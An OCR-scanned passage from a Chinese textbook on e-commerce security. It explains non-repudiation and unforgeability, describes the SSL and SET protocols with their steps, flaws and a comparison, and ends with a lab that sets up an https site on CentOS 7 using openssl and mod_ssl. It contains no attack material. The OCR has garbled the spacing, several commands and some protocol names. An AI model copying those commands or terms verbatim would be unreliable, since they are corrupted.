失 ; 同样 ,如 果 收 到 订单 后 ,计算 机 价格 下 跌 了 ,假如 订货 方 能 否认 先前 发 出 订货 单 的 事实 ， 
则 供应 商 就 会 蒙受 损失 。 

因此 ,保证 交易 过 程 中 的 不 可 抵赖 性 也 是 电子 商务 安全 需求 中 的 一 个 重要 方面 。 这 意 
味 着 ,在 电子 交易 通信 过 程 的 各 个 环节 中 都 必须 是 不 可 否认 的 , 即 交 易 一 旦 达成 ,发 送 方 不 
能 否认 他 发 送 的 信息 ,接收 方 则 不 能 否认 他 所 收 到 的 信息 。 

5. 不 可 伪造 性 

在 商务 活动 中 ,交易 的 文件 是 不 可 被 修改 的 ,如 上 例 所 举 的 订购 计算 机 一 案 , 如 果 供应 
商 在 收 到 订单 后 ,发现 计算 机 价格 大 幅 上 涨 了 ,假如 能 改动 文件 内 容 , 将 订购 数 100 台 改 为 
10 台 , 则 可 大 幅 受 益 ,那么 采购 商 就 会 因此 而 蒙受 巨大 损失 。 在 传统 的 贸易 中 ,可 以 通过 合 
同 字迹 的 技术 鉴定 等 措施 来 防止 交易 过 程 中 出 现 的 伪造 行为 ,但 在 电子 交易 中 ,由 于 没有 书 
面 的 合同 ,因此 无 法 采用 字迹 的 技术 鉴定 等 传统 手段 来 裁决 是 否 发 生 了 伪造 行为 。 

因此 ,保证 交易 过 程 中 的 不 可 伪造 性 也 是 电子 商务 安全 需求 中 的 一 个 方面 。 这 意味 着 ， 
电子 交易 文件 也 要 能 做 到 不 可 修改 ,以 保障 交易 的 严肃 和 公正 。 


10.5.3 电子 商务 安全 协议 

电子 商务 出 现 之 后 ,为 了 保障 电子 商务 的 安全 性 ,人 们 不 断 通 过 各 种 途径 进行 大 量 的 探 
索 ,SSL 安全 协议 和 SET 安全 协议 就 是 这 种 探索 的 两 项 重要 结果 。 

1. SSL 安全 协议 


(1) SSL 安全 协议 简介 。 安 全 套 接 层 协议 (Secure Socket Layer,SSL) ,是 指 将 公 钥 和 
私 钥 技术 相 组 合 的 安全 网 络 通信 协议 。SSL 安全 协议 是 网 景 公 司 (Netscape) 推 出 的 基于 
Web 应 用 的 安全 协议 ,SSL 协议 指定 了 一 种 在 应 用 程序 协议 (如 Http、Telenet、.NMTP 和 
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FTP 等 ) 和 TCP/IP 协议 之 间 提 供 数据 安全 性 分 层 的 机 制 , 它 为 TCP/IP 连接 提供 数据 加 
密 、 服 务 器 认证 、 消 息 完整 性 以 及 可 选 的 客户 机 认证 ,主要 用 于 提高 应 用 程序 之 间 数 据 的 
安全 性 ,对 传送 的 数据 进行 加 密 和 隐藏 ,确保 数据 在 传送 中 不 被 改变 , 即 确保 数据 的 完 
整 性 。 

SSL 以 对 称 密码 技术 和 公开 密码 技术 相 结 合 ,可 以 实现 如 下 3 个 通信 和 目标。 

@ 秘密 性 。SSL 客户 机 和 服务 器 之 间 传 送 的 数据 都 经 过 了 加 密 处 理 ,网 络 中 的 非法 窃 
听 者 所 获取 的 信息 都 将 是 无 意义 的 密 文 信息 。 

@ 完整 性 。SSL 利用 密码 算法 和 散 列 (HASH) 函 数 ,通过 对 传输 信息 特征 值 的 提取 来 
保证 信息 的 完整 性 ,确保 要 传输 的 信息 全 部 到 达 目 的 地 ,可 以 避免 服务 器 和 客户 机 之 间 的 信 
息 受 到 破坏 。 

@ 认证 性 。 利 用 证 书 技术 和 可 信和 的 第 三 方 认证 ,可 以 让 客户 机 和 服务 器 相互 识别 对 方 
的 身份 。 为 了 验证 证 书 持 有 者 是 其 合法 用 户 ( 而 不 是 冒名 用 户 ),SSL 要 求证 书 持 有 者 在 握 
手 时 相互 交换 数字 证 书 , 通 过 验证 来 保证 对 方 身份 的 合法 性 。 

(2) SSL 安全 协议 的 运行 步骤 。 

O@ 接 通 阶段 。 客 户 通 过 网 络 向 服务 商 打 招呼 ,服务 商 回 应 。 

@ 密码 交换 阶段 。 客 户 与 服务 商 之 间 交 换 认可 的 密码 。 一 般 选用 RSA 密码 算法 ,也 
有 的 选用 Diffie-Hellman 和 Fortezza-KEA 密码 算法 。 

@ 会 谈 密 码 阶段 。 客 户 与 服务 商 间 产 生 彼此 交谈 的 会 谈 密码 。 

@ 检验 阶段 。 检 验 服务 商 取得 的 密码 。 

@ 客户 认证 阶段 。 验 证 客户 的 可 信 度 。 

@ 结束 阶段 。 客 户 与 服务 商 之 间 的 相互 交换 结束 的 信息 。 

当 上 述 动作 完成 之 后 ,两 者 间 的 资料 传送 就 会 加 以 密码 ,等 到 另外 一 端 收 到 资料 后 , 青 
将 编码 后 的 资料 还 原 。 即 使 盗窃 者 在 网 络 上 取得 编码 后 的 资料 ,如 果 没 有 原先 编制 的 密码 
算法 ,也 不 能 获得 可 读 的 有 用 资料 。 

在 电子 商务 交易 过 程 中 ,由 于 有 银行 参与 ,按照 SSL 协议 ,客户 购买 的 信息 首先 发 往 商 
家 ,商家 再 将 信息 转发 银行 ,银行 验证 客户 信息 的 合法 性 后 ,通知 商家 付款 成 功 ,商家 再 通知 
客户 购买 成 功 ,将 商品 寄 送 客户 。 

(3) SSL 安全 协议 的 应 用 。SSL 安全 协议 也 是 国际 上 最 早 应 用 于 电子 商务 的 一 种 网 络 
安全 协议 ,至 今 仍 然 有 许多 网 上 商店 在 使 用 。 在 使 用 时 ,SSL 安全 协议 根据 邮购 的 原理 进 
行 了 部 分 改进 。 在 传统 的 邮购 活动 中 ,客户 首先 寻找 商品 信息 ,然后 汇款 给 商家 ,商家 再 把 
商品 寄 给 客户 。 这 里 ,商家 是 可 以 信赖 的 ,所 以 ,客户 须 先 付款 给 商家 。 在 电子 商务 的 开始 
阶段 ,商家 也 是 担心 客户 购买 后 不 付款 ,或 者 使 用 过 期 作废 的 信用 卡 ,因而 希望 银行 给 予 认 
证 。SSL 安全 协议 正 是 在 这 种 背景 下 应 用 于 电子 商务 的 。 

SSL 安全 协议 运行 的 基点 是 商家 对 客户 信息 保密 的 承诺 。 例 如 ,美国 著名 的 马 逊 
(Amazon) 网 上 书店 在 它 的 购买 说 明 中 明确 表示 :“ 当 你 在 亚马逊 公司 购书 时 ,受到 “亚马逊 
公司 安全 购买 保证 ?保护 ,所 以 ,你 永远 不 用 为 你 的 信用 卡 安全 担心 .但 是 在 上 述 流程 中 我 
们 也 可 以 注意 到 ,SSL 安全 协议 有 利于 商家 而 不 利于 客户 。 客 户 的 信息 首先 传 到 商家 ,但 
整个 过 程 中 缺少 了 客户 对 商家 的 认证 。 在 电子 商务 的 开始 阶段 ,由 于 参与 电子 商务 的 公司 
大 都 是 一 些 大 公司 ,信誉 较 高 ,这 个 问题 没有 引起 人 们 的 重视 。 随 着 电子 商务 参与 的 厂商 迅 
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速 增加 ,对 厂商 的 认证 问题 越 来 越 突出 ,SSL 安全 协议 的 缺点 完全 暴露 出 来 。SSL 安全 协 
议 逐 渐 被 新 的 SET 安全 协议 所 取代 。 

2. SET 安全 协议 

(1) SET 协议 简介 。 安 全 电子 交易 协议 (Secure Electronic Transaction, SET) 是 由 
VISA 和 Master-Card 两 大 信用 卡 公 司 联 合 推出 的 规范 。SET 安全 协议 主要 是 为 了 解决 用 
户 .商家 和 银行 之 间 通 过 信用 卡 支付 的 交易 而 设计 的 ,以 保证 支付 信息 的 机 密 、 支 付 过 程 的 
完整 .商户 及 持 卡 人 的 合法 身份 ,以 及 可 操作 性 。SET 中 的 核心 技术 主要 有 公开 密 钥 加 密 、 
电子 数字 签名 ,电子 信封 .电子 安全 证 书 等 。SET 安全 协议 比 SSL 安全 协议 复杂 ,因为 前 者 
不 仅 加 密 两 个 端点 间 的 单个 会 话 , 它 还 可 以 加 密 和 认定 三 方 之 间 的 多 个 信息 。 

在 开放 的 互联 网 上 处 理 电子 商务 ,如 何 保证 买卖 双方 传输 数据 的 安全 成 为 电子 商务 能 
否 普及 的 最 重要 的 问题 。 为 了 克服 SSL 安全 协议 的 缺点 ,两 大 信用 卡 组 织 即 Visa 和 
Master-Card ,联合 开发 了 SET 电子 商务 交易 安全 协议 。 这 是 一 个 为 了 在 互联 网 上 进行 在 
线 交 易 而 设立 的 一 个 开放 的 以 电子 货币 为 基础 的 电子 付款 系统 规范 。SET 安全 协议 在 保 
留 对 客户 信用 卡 认 证 的 前 提 下 ,又 增加 了 对 商家 身份 的 认证 ,这 对 于 需要 支付 货币 的 交易 来 
讲 是 至 关 重要 的 。 由 于 设计 合理 ,SET 安全 协议 得 到 了 IBM、 HP、Microsoft、 VeriFone、 
GTE、VeriSign 等 许多 大 公司 的 支持 ,已 成 为 事实 上 的 工业 标准 。 目 前 , 它 已 获得 了 IETF 
标准 的 认可 。 

1996 年 2 月 1 日 , Master Card 和 Visa 国际 信用 卡 组 织 与 技术 合作 伙伴 GTE、 
Netscape ,IBM、Terisa Systems、Verisign、Microsoft、SAIC 等 一 批 跨国 公司 共同 开发 了 安 
全 电子 交易 规范 (SET)。SET 是 在 开放 网 络 环境 中 的 卡 支付 安全 协议 , 它 采 用 公 钥 密码 体 
制 (PKID 和 X. 509 电子 证 书 标准 ,通过 相应 软件 .电子 证 书 、 数 字 签 名 和 加 密 技术 能 在 电子 
交易 环节 上 提供 更 大 的 信任 度 、 更 完整 的 交易 信息 、 更 高 的 安全 性 和 更 少 受 欺诈 的 可 能 性 。 
SETP 安全 协议 用 以 支持 B to C(Business to Consumer) 这 种 类 型 的 电子 商务 模式 , 即 消费 
者 持 卡 在 网 上 购物 与 交易 的 模式 一 一 B to C 模式 。 

1997 年 2 月 19 日 ,由 Master Card 和 Visa 发 起 成 立 SETCO 公司 (也 获得 了 American 
Express 和 JBC Credit Card Company 的 赞同 )。SETCO 成 立 后 ,立即 着 手 建设 认证 体系 
(CA), 即 为 了 推动 电子 商务 的 发 展 ,首先 要 验证 或 识别 参与 网 上 交易 活动 的 各 个 主体 (如 持 
卡 消费 者 、 商 户 ,收音 银行 的 支付 网 关 ) 的 身份 ,并 用 相应 的 电子 证 书 代表 他 们 的 身份 。 电 子 
证 书 是 由 权威 性 的 公正 认证 机 构 管理 的 ,在 每 次 交易 活动 时 还 需 逐 级 往 上 地 验证 各 认证 机 
构 电 子 证 书 的 真 伪 。 各 级 认证 机 构 是 按 根 认证 机 构 (Root CA) ,品牌 认证 机 构 (Brand CA)， 
以 及 持 卡 人 .商户 或 收 单行 支付 网 关 认 证 机 构 (Holder Card CA,Merchant CA or Payment 
Gateway CA) 由 上 而 下 按 层次 结构 建立 的 。 在 认证 机 构 的 最 高 层 (顶层 ) 即 根 认 证 机 构 
(Root CA) ,由 SETCO 负责 管理 ,其 功能 如 下 。 

Q@ 生成 和 安全 保存 符合 SET 安全 协议 要 求 的 属于 根 认 证 机 构 的 公 、 私 密 钥 。 

@ 生成 和 自行 签署 符合 SET 安全 协议 要 求 的 根 证 书 及 其 数字 签名 。 

@ 处 理 品 牌 认 证 机 构 的 申请 ,生成 、 验 证 品牌 证 书 并 在 品牌 证 书 上 进行 数字 签名 。 

@ 生成 品牌 证 书 撤销 清单 。 

@ 支持 跨 域 交叉 认证 。 

@ 制定 安全 认证 政策 。 
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安全 电子 交易 是 基于 互联 网 的 卡 基 支付 ,是 授权 业务 信息 传输 的 安全 标准 , 它 采 取 
RSA 公开 密 钥 体系 对 通信 双方 进行 认证 ,利用 DES、RC4 或 任何 标准 对 称 加 密 方 法 进行 信 
息 的 加 密 传输 ,并 用 HASH 算法 来 鉴别 消息 真 伪 \ 有 无 算 改 。 在 SET 体系 中 有 一 个 关键 的 
认证 机 构 (CA) ,CA 根据 X509 标准 发 布 和 管理 证 书 。 

(2) SET 安全 协议 运行 的 目标 。SET 安全 协议 要 达到 的 目标 主要 有 以 下 5 个 。 

@ 保证 信息 在 互联 网 上 安全 传输 ,防止 数据 被 黑客 或 被 内 部 人 员 窃 取 。 

@ 保证 电子 商务 参与 者 信息 的 相互 隔离 。 客 户 的 资料 加 密 或 打包 后 通过 商家 到 达 银 
行 ,但 是 商家 不 能 看 到 客户 的 账户 和 密码 信息 。 

@ 解决 多 方 认证 问题 。 不 仅 要 对 消费 者 的 信用 卡 认证 ,而 且 要 对 在 线 商店 的 信誉 程度 
认证 ,同时 还 有 消费 者 在线 商店 与 银行 间 的 认证 。 

@ 保证 网 上 交易 的 实时 性 ,使 所 有 的 支付 过 程 都 是 在 线 的 。 

@ 效仿 EDI 贸易 的 形式 ,规范 协议 和 消息 格式 ,促使 不 同 厂 家 开发 的 软件 具有 兼容 性 
和 互 操作 功能 ,并 且 可 以 运行 在 不 同 的 硬件 和 操作 系统 平台 

(3) SET 安全 协议 涉及 的 范围 。SET 安全 协议 规范 所 涉及 的 对 象 有 以 下 几 类 。 

@ 消费 者 : 包括 个 人 消费 者 和 团体 消费 者 ,按照 在 线 商 店 的 要 求 填写 订货 单 ,通过 由 
发 卡 银行 发 行 的 信用 卡 进行 付款 。 

@ 在 线 商店 : 提供 商品 或 服务 ,具备 相应 电子 货币 使 用 的 条 件 。 

@ 收音 银行 : 通过 支付 网 关 处 理 消 费 者 和 在 线 商店 之 间 的 交易 付款 问题 。 

@ 电子 货币 (如 智能 卡 .电子 现金 .电子 钱包 ) 发 行 公司 ,以 及 某 些 兼 有 电子 货币 发 行 的 
银行 。 负 责 处 理智 能 卡 的 审核 和 支付 工作 。 

@ 认证 中 心 (CA): 负责 对 交易 对 方 的 身份 确认 ,对 厂商 的 信誉 度 和 消费 者 的 支付 手段 
进行 认证 。 

SET 安全 协议 规范 的 技术 范围 包括 以 下 几 方 面 。 

Q@ 加 密 算法 的 应 用 (如 RSA 和 DES)。 

@ 证 书信 息 和 对 象 格式 。 

@ 购买 信息 和 对 象 格式 。 

@ 认可 信息 和 对 象 格式 。 

GO 划 账 信息 和 对 象 格 式 。 

@ 对 话 实体 之 间 的 消息 的 传输 协议 。 

(4) SET 安全 协议 的 工作 原理 。 根 据 SET 安全 协议 的 工作 流程 ,可 将 整个 工作 程序 分 
为 下 面 7 个 步骤 。 

@ 消费 者 利用 自己 的 PC 通过 互联 网 选 所 要 购买 的 物品 ,并 在 计算 机 在 输入 订货 单 。 
订货 单 信息 包括 在 线 商 店 、 购 买 物品 名 称 及 数量 、 交 货 时 间 及 地 点 等 相关 信息 。 

@ 通过 电子 商务 服务 器 与 有 关 在 线 商店 联系 ,在 线 商店 做 出 应 答 , 告 诉 消 费 者 所 填 订 
货 单 的 货物 单价 \ 应 付款 数 、 交 货 方式 等 信息 是 否 准 确 ,是否 有 变化 。 

@ 消费 者 选择 付款 方式 ,确认 订单 ,签发 付款 指令 。 此 时 SET 开始 介入 。 

@ 在 SET 安全 协议 中 ,消费 者 必须 对 订单 和 付款 指令 进行 数字 签名 ,同时 利用 双重 签 
名 技术 保证 高 家 看 不 到 消费 者 的 账号 信息 。 

@ 在 线 商店 接收 订单 后 ,向 消费 者 所 在 银行 请 求 支付 认可 。 信 息 通过 支付 网 关 到 收 单 
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银行 ,再 到 电子 货币 发 行 公司 确认 。 批 准 交易 后 ,返回 确认 信息 给 在 线 商店 。 

@ 在 线 商店 发 送 订 单 确认 信息 给 消费 者 。 消 费 者 端 软件 可 记录 交易 日 志 , 以 备 将 来 
查询 。 

@ 在 线 商店 发 送 货物 或 提供 服务 ,并 通知 收 单 银行 将 钱 从 消费 者 的 账号 转移 到 商店 账 
号 ,或 者 通知 发 卡 银行 请 求 支付 。 

在 认证 操作 和 支付 操作 中 间 一 般 会 有 一 个 时 间 间 隔 , 如 在 每 天 的 下 班 前 请 求 银行 结 一 
天 的 账 。 前 两 步 与 SET 无 关 , 从 第 三 步 开 始 SET 起 作用 ,一 直到 第 七 步 。 在 处 理 过 程 中 ， 
通信 协议 .请 求 信息 的 格式 .数据 类 型 的 定义 等 ,SET 都 有 明确 的 规定 。 在 操作 的 每 一 步 ， 
消费 者 在线 商店 支付 网 关 都 通过 CA 来 验证 通信 主体 的 身份 ,以 确保 通信 的 对 方 不 是 冒 
名 顶 奉 。 所 以 ,也 可 以 简单 地 认为 ,SET 规格 充分 发 挥 了 认证 中 心 的 作用 ,以 维护 在 任何 开 
放 网 络 上 的 电子 商务 参与 者 所 提供 信息 的 真实 性 和 保密 性 。 

(5) SET 安全 协议 的 缺陷 。 从 1996 年 4 月 SET 安全 协议 1.0 版 面市 以 来 ,大 量 的 现 
场 实 验 和 实施 效果 获得 了 业界 的 支持 ,促进 了 SET 良好 的 发 展 趋势 。 但 细心 的 观察 家 也 发 
现 了 一 些 问 题 。 这 些 问题 包括 以 下 几 个 。 

@ 协议 没有 说 明 收 单 银行 给 在 线 商 店 付款 前 ,是 否 必须 收 到 消费 者 的 货物 接受 证 书 ; 
否则 的 话 ,在 线 商 店 提供 的 货物 不 符合 质量 标准 ,消费 者 提出 疑义 ,责任 由 谁 承 担 。 

@ 协议 没有 担保 * 非 拒绝 行为 ,这 意味 着 在 线 商 店 没有 办 法 证 明 订购 是 不 是 由 签署 证 
书 的 消费 者 发 出 的 。 

@ SET 技术 规范 没有 提 及 在 事务 处 理 完 成 后 ,如 何 安全 地 保存 或 销毁 此 类 数据 ,是 否 
应 当 将 数据 保存 在 消费 者 ,在线 商店 或 收 单 银行 的 计算 机 里 。 这 些 漏 洞 可 能 使 这 些 数据 以 
后 受到 潜在 的 攻击 。 

@ 在 完成 一 个 SET 安全 协议 交易 的 过 程 中 , 需 验 证 电子 证 书 9 次 ,验证 数字 签名 6 
次 ,传递 证 书 7 次 ,进行 5 次 签名 、4 次 对 称 加 密 和 4 次 非 对 称 加 密 。 所 以 ,完成 一 个 SET 安 
全 协议 交易 过 程 需 花费 1. 5 一 2 分 钟 ,甚至 更 长 的 时 间 ( 新 式 小 型 电子 钱包 将 多 数 信 息 放 在 
服务 器 上 ,时 间 可 缩短 到 10 一 20 秒 )。SET 安全 协议 过 于 复杂 ,使 用 麻烦 ,成 本 高 , 且 只 适 
用 于 客户 具有 电子 钱包 的 场合 。 

@ SET 的 证 书 格式 比较 特殊 ,虽然 也 遵循 X. 509 标准 ,但 它 主要 是 由 Visa 和 Master 
Card 开发 并 按 信用 卡 支付 方式 来 定义 的 。 银 行 的 支付 业务 不 光 是 卡 支付 业务 ,而 SET 支 
付 方式 和 认证 结构 适用 于 卡 支付 ,对 其 他 支付 方式 是 有 所 限制 的 。 

@ 一 般 认为 ,SET 安全 协议 保密 性 好 ,具有 不 可 否认 性 ,SETCA 是 一 套 严密 的 认证 体 
系 ,可 保证 B to C 类 型 的 电子 商务 安全 顺利 地 进行 。 事实 上 ,安全 是 相对 的 ,我 们 提出 电子 
商务 中 信息 的 保密 性 ,要 保证 支付 和 订单 信息 的 保密 性 , 即 要 求 商 户 只 能 看 到 订单 信息 
(OD ,支付 网 关 只 能 解读 支付 信息 (PD。 但 在 SET 安全 协议 中 ,虽然 账号 不 会 明文 传递 , 它 
通常 用 1024 位 RSA 不 对 称 密 钥 加 密 , 商 户 电子 证 书 确实 指明 了 是 否 人 允许 商户 从 支付 网 关 
的 响应 消息 中 看 到 持 卡 人 的 账号 ,可 是 事实 上 大 多 数 商 户 都 收 到 了 持 卡 人 的 账号 。 

(6) SSL 与 SET 的 比较 。 可 以 从 以 下 4 个 方面 来 比较 SSL 和 SET 的 异同 。 

@ 认证 机 制 。SET 的 安全 要 求 较 高 ,因此 ,所 有 参与 SET 交易 的 成 员 ( 持 卡 人 、 商 家 、 
支付 网 关 等 ) 都 必须 先 申 请 数字 证 书 来 识别 身份 ,而 在 SSL 中 只 有 商店 端的 服务 器 需要 认 
证 ,客户 端 认 证 则 是 有 选择 性 的 。 
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@ 设置 成 本 。 持 卡 者 希望 申请 SET 交易 ,除了 必须 先 申 请 数字 证 书 之 外 ,还 必须 在 计 
算 机 上 安装 符合 SET 规格 的 电子 钱包 软件 ,而 SSL 交易 则 不 需要 另外 安装 软件 。 

@ 安全 性 。 一 般 公认 SET 的 安全 性 较 SSL 高 ,主要 是 因为 整个 交易 过 程 中 ,包括 持 卡 
人 到 商店 端 ,商店 到 付款 转 接 站 再 到 银行 网 络 ,都 受到 严密 的 保护 ,而 SSL 的 安全 范围 只 限 
于 持 卡 人 到 商店 端的 信息 交换 。 

@ 基于 Web 的 应 用 。SET 是 为 信用 卡 交 易 提供 安全 的 , 它 更 通用 一 些 。 然 而 ,如 果 电 
子 商 务 应 用 只 通过 Web 或 是 电子 邮件 , 则 可 能 并 不 需要 SET。 

通过 以 上 分 析 我 们 可 以 看 出 ,SET 从 技术 上 和 流程 上 都 相对 优 于 SSL, 但 这 是 否 就 意 
味 着 未 来 SET 就 会 超过 SSL 的 应 用 ,最 后 完全 取代 SSL 呢 ? 问题 的 结论 是 : 不 一 定 。 因 
为 虽然 SET 通过 制定 标准 和 采用 各 种 技术 手段 ,解决 了 一 直 困 扰 电 子 商务 发 展 的 安全 问 
题 ,其 中 包括 购物 与 支付 信息 的 保密 性 、 交 易 支 付 完整 性 、 身 份 认 证 和 不 可 抵赖 性 ,在 电子 交 
易 环节 上 提供 了 更 大 的 信任 度 、 更 完整 的 交易 信息 、 更 高 的 安全 性 和 更 少 受 欺 诈 的 可 能 性 。 
但 是 由 于 SET 成 本 太 高 , 互 操作 性 差 , 且 实现 过 程 复杂 ,因此 还 有 待 完 善 。 而 SSL 的 自主 
开发 性 强 ,我 国 已 有 很 多 单位 均 已 自主 开发 了 128 位 对 称 加 密 算法 ,并 通过 了 检测 ,这 大 大 
提高 了 它 的 破译 难度 ; 并 且 SSL 协议 已 发 展 到 能 进行 表单 签名 ,在 一 定 程度 上 弥补 了 无 数 
字 签 名 的 不 足 。 


《EECinix 服务 器 部 署 https 安全 站 点 


/ 实 训 目的 

1. 理解 https 的 工作 原理 。 

2. 掌握 Linux 服务 器 配置 https 协议 的 方法 。 

/ 实 训 环 境 

1. 设备 : 联网 计算 机 。 

2. 软件 : Linux(CentOS7 环境 ) 。 

/ 实 训 内 容 

1. https 工作 原理 。 

2. https 站 点 搭建 。 

/ 实 训 步 又 

1. https 工作 原理 

由 于 http 协议 是 以 明文 进行 传输 的 ,这 就 造成 了 传输 的 数据 易 被 拦截 泄露 。 为 解决 
http 传输 过 程 中 无 法 保证 其 安全 性 的 问题 ,https 诞生 了 。https 是 具有 安全 性 的 SSL 加 密 
传输 协议 ,数据 在 离开 发 送 端 前 被 加 密 ,到 客户 端 进行 解密 ,这 样 就 使 得 数据 在 传输 过 程 中 
的 安全 性 大 大 提高 了 。 服 务 器 启用 SSL 协议 需要 获得 一 个 服务 器 证 书 , 并 将 该 证 书 与 要 使 
用 SSL 的 服务 器 绑 定 。 

https 协议 下 客户 (Client) 和 服务 器 (Server) 之 间 的 交互 步 又 如 下 。 
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@ Client 发 送 https 请 求 。 

@ Client 和 Server 通过 TCP(Transmission Control Protocol ,传输 控制 协议 ) 的 三 次 
握手 建立 连接 , 且 协商 完 SSL 的 版 本 和 加 密 算 法 。 

@ Server 发 送 crt(certificate 的 缩写 , 即 证 书 ) 给 Client。 

@ Client 通过 信任 机 构 CA 的 证 书 , 验 证 Server 证 书 的 有 效 性 , 若 证 书 无 效 , 则 显示 告 
警 ; 若 证 书 有 效 ,Client 随机 生成 一 个 字符 串 ,并 使 用 Server 证 书 中 的 公 钥 对 随机 字符 串 进 
行 加 密 。 

@ Client 发 送 加 密 后 的 随机 字符 串 给 Server。 


@ Server 使 用 自己 的 私 钥 解密 ,获取 Client 产生 的 随机 字符 串 。 此 后 , Client 和 


Server 之 


间 的 通信 数据 都 使 用 该 随机 字符 串 进 行 对 称 加 密 。 


@ Server 使 用 随机 字符 串 加 密 数 据 , 并 发 送 给 Client。 


@ Client 使 用 随机 字符 串 解 密 数据 。 
2. https 站 点 搭建 
(1) 申请 证 书 。 
1] [root@localhost certs]# 
2] [root@localhost certs]# 
3] [root@localhost ~]# cd /etc/pki/tls/certs/ 
4] [root@localhost certs]# 
5] [root@localhost certs]# 
6] ” 井 建 立 服务 器 私 钥 
7] [root@localhost certs]# make server.key 
8] umask 77 ; \ 
9] /usr/bin/openssl genrsa - aes128 2048 > server.key 
10] Generating RSA private key, 2048 bit long modulus 
11 
12] .. et 
13] eis 65537 (0x10001) 
14] Enter pass phrase: 
15] Verifying — Enter pass phrase: 
16] [root@localhost certs]# 
17] [root@localhost certs]# 
18] # 删 除 密 钥 中 的 口令 ,防止 系统 启动 被 询问 口令 
19] [root@localhost certs]# openssl rsa - in server.key - out server.key 
20] Enter pass phrase for server.key: 
21] writing RSA key 
22] [root@localhost certs]# 
23] [root@localhost certs]# 
24] [root@localhost certs]# ls 
25] ca- bundle.crt make— dummy — cert renew 一 dummy — cert 
26 ca— bundle. trust. crt Makefile server. key 
27] [root@localhost certs]# 
28] [root@localhost certs]# 
[29]  # 建 立 服务 器 公 钥 
30 [root@localhost certs]# make server.csr 
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34 
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36 
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39 
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47 
48 
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50 
51 
52 
53 
54 
55 
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62 
63 
64 
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68 


1] 
2] 
3] 
4] 
5] 
6] 
到 


umask 77 ; \ 

/usr/bin/openssl] req — utf8 - new — key server.key - out server.csr 

You are about to be asked to enter information that will be incorporated 
into your certificate request. 

What you are about to enter is what is called a Distinguished Name or a DN. 
There are quite a few fields but you can leave some blank 

For some fields there will be a default value, 

If you enter '.', the field will be left blank. 


Country Name (2 letter code) [Xx]:HH 

State or Province Name (full name) []:HH 

Locality Name (eg, city) [Default City] :HH 

Organization Name (eg, company) [Default Company Ltd] :HH 
Organizational Unit Name (eg, section) []:HH 

Common Name (eg, your name or your server''s hostname) []:HH 
Email Address [ ] :8 *x*xxx#*x#* (@qq. com # 邮箱 地 址 

Please enter the following 'extra' attributes 

to be sent with your certificate request 

A challenge password [ ]: 

Rn optional company name [ ]: 

[root@1localhost certs]# 

[root@localhost certs]# ls 

ca— bundle.crt make— dummy — cert renew 一 dummy — cert server.key 
ca— bundle. trust. crt Makefile Server. csr 
[root@localhost certs]# 

[root@1localhost certs]# 

# 建 立 服务 器 证 书 ,过 期 时 间 1 年 


[root@1ocalhost certs]# openssl x509 - in server.csr - out server.pem - req - signkey 


server. key — days 365 


Signature ok 

subject = /C= HH/ST = HH/L = HH/0= HH/0U = HH/CN = HH/emailAddress = 8 xxx#x#xxx# (@qq. com 
Getting Private key 

[root@1localhost certs]# 

[root@1localhost certs]# 

[root@1localhost certs]# ls 

ca 一 bundle. crt make 一 dummy — cert renew — dummy - cert server.key 

ca bundle. trust. crt Makefile server. csr server. pem 

[root@1localhost certs]# chmod 400 server. * 

[root@1localhost certs]# 


(2) 安装 配置 mod_ssl 模块 。 


[root@localhost certs]# Yum install -Ymod_ss] 

已 加 载 插件 : fastestmirror, langpacks 

Loading mirror speeds from cached hostfile 

正在 解决 依赖 关系 

一 -> 正在 检查 事务 

一 -一 > 软件 包 mod_ssl. x86_64.1.2.4.6 一 40.el7.centos 将 被 安装 
一 -> 解决 依赖 关系 完成 
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8] ”依赖 关系 解决 
31 
10] 
11] 
[12] 
13] 
14] 
15] 
16] 安装 1 软件 包 

17] 总 下 载 量 : 103 k 

18] 安装 大 小 : 224 k 

19] Downloading packages: 

20] Running transaction check 
21] Running transaction test 
22] Transaction test succeeded 
[23] Running transaction 


24] 正在 安装 : 1l:mod_ssl-2.4.6-40.el7.centos.x86_64 1/1 
[25] 验证 中 : 1:mod_ssl — 2.4.6— 40.el7.centos. x86 64 1/1 
[26] 已 安装 : 

[27] mod_ssl.x86_ 64 1:2.4.6— 40.el7.centos 

28] 完毕 ! 


29] [root@localhost certs]# 

30] [root@localhost certs]# 

31] [root@localhost certs]# cd /etc/httpd/conf.d/ 
32] [root@localhost conf.d]# vim ssl.conf 

[33] 去 掉 间 DocumentRoot "/var/www/html" 最 前 面 的 # 

34] [root@localhost conf.d]# systemctl restart httpd 
35] [root@localhost conf.d]# 


(3) 测试 是 否 成 功 。 
先 使 用 http 访问 网 站 ,看 能 否 成 功 访问 ,如 图 10-4 所 示 ,表示 可 以 访问 。 使 用 https 进 
行 访问 ,如 果 出 现 警告 ,就 代表 成 功 安 装 了 ,如 图 10-5 所 示 。 


http://192.168...32/index.html x 


€ 3 T192168.60.32/indexhtml 
SD 
加 最 党 访问 [火狐 官方 站 点 门 新 手 上 路 | 第 用 网 址 园 


Welcome to https web 


图 10-4 http 访问 页 面 


因为 证 书 是 自己 创建 的 ,所 以 浏览 器 (本 实验 使 用 的 是 火狐 浏览 器 ) 会 报 不 信任 ,添加 例 
外 即 可 。 添 加 例外 的 方法 是 : 打开 火狐 浏览 器 ,在 右上 角 找 到 “菜单 ”, 然 后 单 击 “ 菜 单 ”, 单 
击 菜单 中 的 “选项 ”( 如 图 10-6 所 示 ) , 单 击 选项 中 的 “隐私 与 安全 ”, 在 右 侧 找 到 “证 书 ” 的 “ 查 
看 证 书 ” 按 钮 (如 图 10-7 所 示 ), 单 击 “ 查 看 证 书 ” 按 钮 ,选择 “服务 器 ”选项 , 单 击 “ 添 加 例外 ” 
按钮 (如 图 10-8 所 示 ) ,输入 本 实验 网 址 https://192. 168. 60. 32, 单 击 “ 获 取证 书 ” 按 钮 ,最 
后 单 击 “ 确 认 安 全 例外 ”按钮 (如 图 10-9 所 示 )。 
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|€ © https//192.168.60.32/indexhtml 本 避 CQ BEC | 位 自 咏 会 
园 县 时 访问 官方 法 点 站 亲手 上 路 上 香 用 网 址 加 要 三 


图 10-5 https 访问 页 面 


从 加 三 二 六 


他 到 
1 GB 0 Cl+N 
99 新 建 隐私 窗口 Ctrl+Shift+p 


园 你 路 先 前 的 浏览 状态 


缩放 一 100% 十 2 
编辑 % 中 自 
> 
Ctrl+Shift+A 

EE 而 
Cd+O 
另存 页 面 为 … Ctrl+S 

和 打印 … 

QQ 在 此 页 面 中 查找 Cul#F 
更 多 > 
Web 开发 者 > 

图 帮助 > 

加 退出 Ctrl+Shift+Q 


10-6 ”打开 浏览 器 菜单 


276 


@® Firefox 帮助 


